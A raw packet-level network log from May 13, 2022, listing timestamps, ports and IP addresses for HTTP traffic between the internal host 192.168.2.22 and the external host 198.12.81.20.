May 13, 2022 16:42:02.687320948 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687346935 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687359095 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687398911 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687398911 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687421083 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687438965 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687464952 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687477112 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687495947 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687515974 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687525988 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687556028 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687587023 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687597036 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687613010 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687637091 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687673092 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687674046 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687705994 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687714100 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687720060 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687752962 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687777996 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687791109 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687808037 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687829971 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687850952 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687886000 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.691730976 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.801614046 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801680088 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801719904 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801728964 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.801759958 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801779032 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.801786900 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.801803112 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801806927 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.801842928 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801871061 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.801883936 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801892996 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.801923037 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801945925 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.801960945 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.801968098 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802000999 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802022934 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802038908 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802046061 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802078962 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802094936 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802118063 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802133083 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802158117 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802187920 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802196980 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802229881 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802234888 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802252054 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802279949 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802294016 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802319050 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802340031 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802359104 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802369118 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802397966 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802418947 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802438021 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802476883 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802479982 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802495003 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802517891 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802525997 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802556038 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802582979 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802596092 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802629948 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802634954 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802651882 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802674055 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802690029 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802712917 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802751064 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802773952 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802783966 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802791119 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802809954 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802830935 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802835941 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802869081 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802891016 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802910089 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802917957 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802951097 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802968025 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.802989006 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.802994967 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.803029060 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.803064108 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.803086996 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.805620909 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.805718899 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.805758953 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.805769920 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.805794954 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.805799961 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.805815935 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.805854082 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.807049036 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917064905 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917124987 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917166948 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917198896 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917203903 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917243958 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917248964 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917256117 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917260885 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917289019 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917305946 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917326927 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917347908 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917366982 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917382002 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917406082 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917418003 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917447090 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917463064 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917486906 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917499065 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917525053 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917538881 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917563915 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917577982 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917603970 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917614937 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917640924 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917661905 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917685986 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.917696953 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.917737007 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.920742035 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.920802116 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.920821905 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.920842886 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.920876026 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.920907021 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.920947075 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.920948982 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.920968056 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.920986891 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.920995951 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921027899 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921056986 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921068907 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921078920 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921108961 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921128035 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921149969 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921186924 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921190023 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921206951 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921226978 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921228886 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921268940 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921283960 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921308041 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921324968 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921353102 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921360970 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921394110 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921415091 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921431065 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921452999 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921472073 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921489000 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921513081 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921529055 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921550989 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921570063 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921591043 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921606064 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921629906 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921648979 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921669960 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921694040 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921710968 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921721935 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921750069 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921767950 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921788931 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921803951 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921829939 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921849012 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921868086 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921883106 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921907902 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921922922 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921947956 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921978951 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.921988010 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.921996117 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.922046900 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.923386097 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.031491041 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.031552076 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.031591892 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.031631947 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.031713009 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.031750917 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.031774998 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.031789064 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.031807899 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.031811953 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.031815052 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.031830072 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.031842947 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.031874895 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037303925 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037364006 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037404060 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037444115 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037482977 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037497044 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037518024 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037523031 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037556887 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037564993 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037590027 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037606001 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037626982 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037648916 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037673950 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037687063 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037703037 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037725925 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037731886 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037765980 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037792921 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037803888 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037821054 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037843943 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037854910 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037884951 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037900925 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037926912 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037930012 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.037967920 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.037997007 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038006067 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038019896 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038045883 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038049936 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038084984 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038110971 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038121939 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038139105 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038161993 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038170099 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038199902 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038224936 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038239956 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038254976 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038280964 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038288116 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038321972 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038352966 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038361073 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038377047 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038400888 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038413048 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038439035 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038470030 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038477898 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038499117 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038516998 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038531065 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038558006 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038574934 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038599014 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038604021 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038636923 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038666010 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038676977 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038693905 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038716078 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038727045 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038753986 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038774014 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038793087 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038805962 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038830042 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038851023 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038870096 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.038882017 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.038933039 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.041452885 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.149667978 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149713039 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149744034 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149772882 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149804115 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149821997 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.149836063 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149854898 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.149859905 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.149868011 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149879932 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.149899960 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149908066 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.149931908 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149935961 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.149960995 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.149981976 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.149995089 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.150003910 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.150026083 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.150031090 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.150058985 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.150073051 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.150091887 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.150095940 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.150122881 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.150141001 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.150154114 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.150163889 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.150188923 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152518988 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152553082 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152584076 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152612925 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152631044 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152642965 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152642965 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152664900 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152676105 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152690887 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152707100 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152714968 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152738094 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152749062 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152769089 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152781010 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152793884 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:03.152801037 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:03.152838945 CEST	49173	80	192.168.2.22	198.12.81.20
